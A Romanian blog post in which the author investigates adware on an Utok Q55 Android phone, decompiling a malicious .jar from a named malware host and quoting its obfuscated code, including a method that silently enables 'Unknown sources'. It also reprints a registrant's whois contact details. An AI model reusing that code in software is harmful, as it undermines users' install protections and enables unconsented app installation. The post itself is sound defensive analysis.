Pățanii cu Android…

La începutul anului Cristiana a primit cadou un telefon Utok Q55. Ieftin, chinezesc, românesc… – dar are niște specificații bunicele. În fine, în continuare nu-mi propun o recenzie a lui, ci să povestesc din pățaniile de securitate prin care am trecut.

Primele simptome

Acum câteva luni, din senin, ne-am trezit cu aplicații care s-au instalat singure (un fel de joc cu „bubbles”, Hola Launcher, Apus Launcher). Le-am dezinstalat, dar au reapărut după un timp.
Am șters apk-urile (cu nume aleatorii) găsite fie în stocare internă, fie în SD card. Am pus setarea Unknown sources la No.
După câteva zile, surpriză: aplicațiile pe care le scosesem se reinstalau, iar setarea Unknown sources era pusă pe Yes.

Tot în aceeași perioadă Secure Net de la Vodafone tot trimitea mesaje că a blocat descărcarea de conținut periculos.

Reparația capitală

După ce am stăruit un pic pe lângă cei de la Utok să publice pe sait stock ROM-ul pentru modelul Q55 (cam într-o săptămână au remediat problema), am trecut la reinstalarea software-ului.
Lucrurile au mers bine până când în primele minute după reinstalare a reapărut din senin joculețul cu „bubbles”.
Am șters disperat SD cardul și am reinstalat software-ul din nou (cam ca pe vremurile bune, cu Windows XP…).

Problema nu a reapărut, însă în perioada următoare mai veneau sporadic mesaje de la Secure Net și cam în fiecare dimineață dezactivam setarea Unknown sources (pe care o regăseam mereu activată).

My Recent Apps

Agresiunea launcherelor (Hola și Apus) și a bulelor a fost înlocuită de agresiunea unei aplicații obscure numită My Recent Apps (am păstrat apk-ul, pentru curioși), care apărea din senin după deblocarea ecranului.

Noua reparație capitală

Am găsit pe saitul Utok o versiune și mai recentă a ROM-ului (UTOK_Q55_sw_24.03.2016_RO) și am instalat-o cu gândul că poate rezolvă problema de securitate legată de activarea automată a setării Unknown sources. Bineînțeles că nu. Zilnic o dezactivez și degeaba.

Pe firul lăsat de Secure Net

Două mesaje de la Vodafone Secure Net îmi stârnesc curiozitatea și încep să merg un pic pe fir.
Textul sună așa: Fisierul accesat in 23May16 h12:18 la http://www.lichtw.com/uploadPath/20160519135835.ja este periculos si a fost blocat de Secure Net. Detalii pe http://www.vodafone.ro/securenet. Adresa indicată nu returnează nimic, dar dacă schimb extensia din .ja în .jar, se descarcă ceva de acolo.

Extrag conținutul arhivei .jar (în fond .apk este tot o arhivă .jar) și găsesc classes.dex și META-INF.

Decompilez classes.dex online, apoi offline cu o unealtă interesantă (JADX). Rezultă vreo 158 de clase Java, cu nume scurte, „obfuscate”. Nu înțeleg mare lucru de acolo, însă totuși dau peste a.java în care găsesc niște lucruri.

De pildă, variabile sau metode cu denumiri suspecte:

private Date hookworm;
private Date idolatrous;
private Context mContext;
private double mediatory;
private int sallied;
private int tsimshian;

public static String getLibUID() {
   return "20160519135832PERIODONTIST";
}

public static String getLibVer() {
   return "20160519135832MILLIFARAD";
}

ifxejqk(1129790026);
if (!bInput) {
   bInput = true;
   try {
       at atVar = new at();
       ensureApkInstallSecurity(context);
   } catch (Exception e) {
        Arrays.asList(new String[]{"xmdemhyx", "kqlimxum", "mbpmtinx"});
        e.printStackTrace();
   }
   try {
        bm.f().a(context, mGlobalId, getLibVer());
   } catch (Exception e2) {
        String str = "autoplagiarism";

și o metodă:

private static boolean ensureApkInstallSecurity(Context context) {
return Secure.getInt(context.getContentResolver(), "install_non_market_apps", 0) == 0 ? Secure.putInt(context.getContentResolver(), "install_non_market_apps", 1) : true;
}

Îmi amintesc că am mai citit despre „how to programmatically change unknown sources” și apărea în discuții setarea install_non_market_apps. Se pare că ensureApkInstallSecurity() face exact ce mă enerva pe mine: verifică starea Unknown sources și o activează, dacă nu este deja activată, lăsând apoi loc etapei următoare a infecției – descărcarea locală a unui apk și instalarea lui fără acordul utilizatorului.

Chinezăria trage la China

Mă întorc la adresa de unde ceva de pe telefon încerca să descarce arhiva .jar: www.lichtw.com
Pagina inițială nu afișează nimic.
O căutare whois dă ceva amănunte:

Registrant Contact
Name: zhang xing
Organization: zxsunland
Mailing Address: beijing, beijing beijing 10000 CN
Phone: +86.15136111307
Ext:
Fax:
Fax Ext:
Email: zhangsheng0831@gmail.com

Se pare că emailul celui ce a făcut înregistrarea domeniului este folosit și la o mulțime de alte domenii cu nume dubioase.

Foarte interesant! Ceva din software-ul chinezăriei caută „noutăți” înapoi acasă.
Îmi pot închipui că nimic din ce a văzut telefonul ăsta nu a scăpat de ochi străini? Îmi pot…

Sper că Utok repară vulnerabilitatea asta înainte să fie nevoie să rezolv problema apelând la ANPC sau la instanțe.

Actualizare: (25.07.2016) problemele descrise în articol au fost rezolvate prin instalarea versiunii UTOK-Q55-sw-EU-v09, descărcată de pe utok.ro.

Reclame